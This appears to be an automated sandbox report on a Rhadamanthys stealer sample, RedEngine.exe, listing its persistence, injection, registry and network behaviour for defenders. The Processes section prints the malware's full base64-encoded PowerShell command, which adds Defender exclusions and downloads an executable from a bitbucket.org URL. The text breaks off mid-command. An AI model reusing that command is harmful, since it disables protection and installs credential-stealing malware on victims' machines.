Malware Analysis Report

2024-11-13 13:50

Sample ID 240405-vkchlshe5x
Target RedEngine.exe
SHA256 ccc95afa02727297eb7f6bbbe5e06d011ce4656c3b563e2841fad60d471e2f26
Tags
rhadamanthys evasion persistence stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ccc95afa02727297eb7f6bbbe5e06d011ce4656c3b563e2841fad60d471e2f26

Threat Level: Known bad

The file RedEngine.exe was found to be: Known bad.

Malicious Activity Summary

rhadamanthys evasion persistence stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

Rhadamanthys

Downloads MZ/PE file

Blocklisted process makes network request

Creates new service(s)

Stops running service(s)

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-05 17:02

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-05 17:02

Reported

2024-04-05 17:05

Platform

win10v2004-20240226-en

Max time kernel

150s

Max time network

151s

Command Line

winlogon.exe

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2040 created 2612 N/A C:\Users\Admin\AppData\Roaming\liccheck.exe C:\Windows\system32\sihost.exe

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Creates new service(s)

persistence

Downloads MZ/PE file

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RedEngine.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Clipper = "\"C:\\Users\\Admin\\AppData\\Roaming\\Clipper\\Clipper.exe\" " C:\Users\Admin\AppData\Roaming\LicGet.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Roaming\lic.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3504 set thread context of 1448 N/A C:\Users\Admin\AppData\Roaming\lic.exe C:\Windows\system32\dialer.exe

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\liccheck.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\liccheck.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\lic.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\lic.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\lic.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\lic.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\lic.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\lic.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\lic.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\lic.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\lic.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\lic.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\lic.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\lic.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\lic.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\lic.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\lic.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\lic.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\lic.exe N/A
N/A N/A C:\ProgramData\mwvfjadyvgps\ebvoxlrooljj.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\lic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2240 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\RedEngine.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2240 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\RedEngine.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2240 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\RedEngine.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2740 wrote to memory of 3076 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2740 wrote to memory of 3076 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2740 wrote to memory of 3076 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2740 wrote to memory of 3504 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lic.exe
PID 2740 wrote to memory of 3504 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lic.exe
PID 2740 wrote to memory of 2040 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\liccheck.exe
PID 2740 wrote to memory of 2040 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\liccheck.exe
PID 2740 wrote to memory of 2040 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\liccheck.exe
PID 2740 wrote to memory of 3448 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\LicGet.exe
PID 2740 wrote to memory of 3448 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\LicGet.exe
PID 2040 wrote to memory of 3988 N/A C:\Users\Admin\AppData\Roaming\liccheck.exe C:\Windows\SysWOW64\dialer.exe
PID 2040 wrote to memory of 3988 N/A C:\Users\Admin\AppData\Roaming\liccheck.exe C:\Windows\SysWOW64\dialer.exe
PID 2040 wrote to memory of 3988 N/A C:\Users\Admin\AppData\Roaming\liccheck.exe C:\Windows\SysWOW64\dialer.exe
PID 2040 wrote to memory of 3988 N/A C:\Users\Admin\AppData\Roaming\liccheck.exe C:\Windows\SysWOW64\dialer.exe
PID 2040 wrote to memory of 3988 N/A C:\Users\Admin\AppData\Roaming\liccheck.exe C:\Windows\SysWOW64\dialer.exe
PID 2556 wrote to memory of 2248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 2556 wrote to memory of 2248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 3504 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Roaming\lic.exe C:\Windows\system32\dialer.exe
PID 3504 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Roaming\lic.exe C:\Windows\system32\dialer.exe
PID 3504 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Roaming\lic.exe C:\Windows\system32\dialer.exe
PID 3504 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Roaming\lic.exe C:\Windows\system32\dialer.exe
PID 3504 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Roaming\lic.exe C:\Windows\system32\dialer.exe
PID 3504 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Roaming\lic.exe C:\Windows\system32\dialer.exe
PID 3504 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Roaming\lic.exe C:\Windows\system32\dialer.exe
PID 8 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 8 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 1448 wrote to memory of 616 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\winlogon.exe
PID 1448 wrote to memory of 668 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\lsass.exe
PID 1448 wrote to memory of 948 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 1448 wrote to memory of 64 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\dwm.exe
PID 1448 wrote to memory of 512 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 1448 wrote to memory of 428 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 1448 wrote to memory of 1032 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 1448 wrote to memory of 1060 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 1448 wrote to memory of 1068 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 1448 wrote to memory of 1156 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 1448 wrote to memory of 1184 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 1448 wrote to memory of 1304 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 1448 wrote to memory of 1312 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2656 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Users\Admin\AppData\Local\Temp\RedEngine.exe

"C:\Users\Admin\AppData\Local\Temp\RedEngine.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAeQBkACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHUAZgBoACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAbABpAGMAZQBuAHMAZQAhACAAQwBvAG4AbgBlAGMAdAAgAHkAbwB1AHIAIABTAHQAZQBhAG0AIABhAGMAYwBvAHUAbgB0ACAAaQBuACAAbwByAGQAZQByACAAdABvACAAZwBlAHQAIABhACAAbABpAGMAZQBuAHMAZQAuACAATQBhAGsAZQAgAHMAdQByAGUAIAB0AGgAYQB0ACAAeQBvAHUAIABhAHIAZQAgAG4AbwB0ACAAdQBzAGkAbgBnACAAYQBsAHQAZQByAG4AYQB0AGkAdgBlACAAYQBjAGMAbwB1AG4AdAAsACAAbwB0AGgAZQByAHcAaQBzAGUAIABsAGkAYwBlAG4AcwBlACAAdwBpAGwAbAAgAG4AbwB0ACAAYgBlACAAZwBpAHYAZQBuAC4AIAAoAFQAaABpAHMAIABpAHMAIABkAG8AbgBlACAAdABvACAAcAByAGUAdgBlAG4AdAAgAGMAcgBhAGMAawBpAG4AZwApACcALAAnACcALAAnAE8ASwAnACwAJwBXAGEAcgBuAGkAbgBnACcAKQA8ACMAegBxAGUAIwA+ADsAIgA7ADwAIwBsAGIAcgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAYwBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAcABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAcwBpACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AZABhAGcAZQB3AGgALwB0AGUAcwB0ADYAMwA0ADIANQAvAHIAYQB3AC8AMwAwADAANQBkAGQAMgBkADUANwAzADcAOQA4ADMAMQAyADQAMwAwADEAYQBkADgANgA0ADIANwA4AGYAZgA1ADMAMwBjAGMAOQA3ADEAYQAvAEwAZQB2AGkAUAByAG8AdAAuAGUAeABlACcALAAgADwAIwB6AHEAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGkAagBmACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAH